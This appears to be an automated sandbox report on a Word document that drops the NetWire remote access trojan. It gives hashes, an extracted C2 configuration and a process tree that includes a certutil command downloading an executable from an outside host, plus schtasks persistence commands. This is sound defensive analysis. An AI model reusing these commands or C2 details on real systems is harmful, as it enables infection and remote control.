Analysis
- max time kernel: 102s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30-09-2022 09:25
Behavioral task: behavioral1
- Sample: RFQ 80479040.doc
- Resource: win7-20220812-en
General
- Target: RFQ 80479040.doc
- Size: 62KB
- MD5: 31c3a3ef341ada198075d57bf07cc03d
- SHA1: d8ee2ef6d1066ce0fd1f95784c4381374d890adf
- SHA256: b995f53ac55eb6ce01af25e1cc21f26bf182aaf97e7c09be062250bf8e5df4b6
- SHA512: a00412dd6ecaa738b6a7c58b76e578bba9ae7fca4b475667fa6198822f094b88b253938fb9d8f5eb94a1da0fd0f84c513cbab52c06dbcaf0e39520b217301b42
- SSDEEP: 384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI
Malware Config
Extracted
- Family: netwire
- C2: 37.0.14.206:3384
- activex_autorun: false
- copy_executable: true
- delete_original: false
- host_id: HostId-%Rand%
- install_path: %AppData%\Install\Host.exe
- keylogger_dir: %AppData%\Logs\
- lock_executable: true
- offline_keylogger: true
- password: Password234
- registry_autorun: false
- use_mutex: false
Signatures
-
NetWire RAT payload (6 IoCs)
Processes:
  resource                                                                       yara_rule
  behavioral2/memory/540-151-0x0000000000400000-0x0000000000433000-memory.dmp    netwire
  behavioral2/memory/540-154-0x0000000000400000-0x0000000000433000-memory.dmp    netwire
  behavioral2/memory/540-155-0x0000000000400000-0x0000000000433000-memory.dmp    netwire
  behavioral2/memory/2988-167-0x0000000000400000-0x0000000000433000-memory.dmp   netwire
  behavioral2/memory/2988-168-0x0000000000400000-0x0000000000433000-memory.dmp   netwire
  behavioral2/memory/2988-169-0x0000000000400000-0x0000000000433000-memory.dmp   netwire
-
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description                                                                                                 pid   pid_target  process       target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process   3104  2352        certutil.exe  WINWORD.EXE
-
Downloads MZ/PE file
-
Executes dropped EXE (5 IoCs)
Processes:
  pid   process
  220   WinUpdate.exe
  540   WinUpdate.exe
  2604  Host.exe
  2308  Host.exe
  2988  Host.exe
-
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description        ioc                                                                                                     process
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation   WinUpdate.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation   WinUpdate.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation   Host.exe
-
Suspicious use of SetThreadContext (2 IoCs)
Processes:
  description                          pid   process        target process
  PID 220 set thread context of 540    220   WinUpdate.exe  WinUpdate.exe
  PID 2604 set thread context of 2988  2604  Host.exe       Host.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                                 process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                    WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz               WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE
-
Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   process
  3024  schtasks.exe
  4540  schtasks.exe
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description        ioc                                                              process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid   process      count
  2352  WINWORD.EXE  2
-
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid   process        count
  220   WinUpdate.exe  1
  2604  Host.exe       3
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  220   WinUpdate.exe
  Token: SeDebugPrivilege  2604  Host.exe
-
Suspicious use of SetWindowsHookEx (7 IoCs)
Processes:
  pid   process      count
  2352  WINWORD.EXE  7
-
Suspicious use of WriteProcessMemory (39 IoCs)
Processes:
  description                        pid   process        target process  count
  PID 2352 wrote to memory of 3104   2352  WINWORD.EXE    certutil.exe    2
  PID 2352 wrote to memory of 220    2352  WINWORD.EXE    WinUpdate.exe   3
  PID 220 wrote to memory of 3024    220   WinUpdate.exe  schtasks.exe    3
  PID 220 wrote to memory of 540     220   WinUpdate.exe  WinUpdate.exe   11
  PID 540 wrote to memory of 2604    540   WinUpdate.exe  Host.exe        3
  PID 2604 wrote to memory of 4540   2604  Host.exe       schtasks.exe    3
  PID 2604 wrote to memory of 2308   2604  Host.exe       Host.exe        3
  PID 2604 wrote to memory of 2988   2604  Host.exe       Host.exe        11
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\certutil.exe (level 2)
    Command line: "C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    - Process spawned unexpected child process
-
  C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe (level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\SysWOW64\schtasks.exe (level 3)
      Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1146.tmp"
      - Creates scheduled task(s)
-
    C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe (level 3)
      Command line: "{path}"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
-
      C:\Users\Admin\AppData\Roaming\Install\Host.exe (level 4)
        Command line: "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
-
        C:\Windows\SysWOW64\schtasks.exe (level 5)
          Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7BC7.tmp"
          - Creates scheduled task(s)
-
        C:\Users\Admin\AppData\Roaming\Install\Host.exe (level 5)
          Command line: "{path}"
          - Executes dropped EXE
-
        C:\Users\Admin\AppData\Roaming\Install\Host.exe (level 5)
          Command line: "{path}"
          - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
  Filesize: 882KB
  MD5: 95b5d76bfb2204011333248cc121b5a4
  SHA1: 6faea7983c34f12cec7d22184be0eb1693e0abaf
  SHA256: 849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
  SHA512: 966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Local\Temp\tmp1146.tmp
  Filesize: 1KB
  MD5: 65f892aa7144c7be9e9f0a64060f5f79
  SHA1: 33d937d86129a4c23affae32947812eb136fdacb
  SHA256: fae46df3949c6dc59024f3dfbb59c659f1ea3f1ee8f6577a86da8f61af455d3c
  SHA512: 56585dce966d86b92a31e3384fe406b29a267da169efd8687552d3b927ddadb92579f83297866aeea394ac6c46abb3bd6cce605e9bd66c50091ff066024aca0f
-
C:\Users\Admin\AppData\Local\Temp\tmp7BC7.tmp
  Filesize: 1KB
  MD5: 65f892aa7144c7be9e9f0a64060f5f79
  SHA1: 33d937d86129a4c23affae32947812eb136fdacb
  SHA256: fae46df3949c6dc59024f3dfbb59c659f1ea3f1ee8f6577a86da8f61af455d3c
  SHA512: 56585dce966d86b92a31e3384fe406b29a267da169efd8687552d3b927ddadb92579f83297866aeea394ac6c46abb3bd6cce605e9bd66c50091ff066024aca0f
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe
  Filesize: 882KB
  MD5: 95b5d76bfb2204011333248cc121b5a4
  SHA1: 6faea7983c34f12cec7d22184be0eb1693e0abaf
  SHA256: 849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
  SHA512: 966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152